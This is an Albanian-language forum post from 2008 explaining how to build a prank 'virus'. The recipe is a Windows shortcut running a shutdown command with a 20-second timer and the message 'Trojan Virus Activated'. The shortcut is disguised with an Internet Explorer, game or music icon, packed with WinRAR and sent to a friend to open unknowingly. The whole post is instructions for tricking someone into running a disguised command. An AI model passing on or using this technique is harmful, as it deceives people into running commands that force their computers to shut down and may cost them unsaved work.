Si ta krioim nje Shourt per Fikjen e PC's.

Shko poshtė

Si ta krioim nje Shourt per Fikjen e PC's.

Mesazh  3gp' prej Sun Nov 30, 2008 11:58 am

Se parii krijon nje shortcut edhe pastaj e hapet nje tabel dhee e shenon attyyy pa thonjeza "shutdown -s -t 20 -c "Trojan Virus Activated" edhe e shenon emrin psh internet explorer edhe ja ndrron ikonen dhee e bon me winrar edhe ja qon ndonje shokuu dhee pastaj pasii qi ta bonn extract aiii dhe do klikoj mbii tee virusi per 20 sekonda do ti infektohet mund ta beniii me qfaro do ikonee psh loja muzik etj... kalofshi mir
avatar
3gp'
Webmaster
Webmaster

Numri i postimeve : 211
Join date : 18/05/2008
Age : 26

Shiko profilin e anėtarit

Mbrapsht nė krye Shko poshtė

Mbrapsht nė krye


 
Drejtat e ktij Forumit:
Ju nuk mund ti pėrgjigjeni temave tė kėtij forumi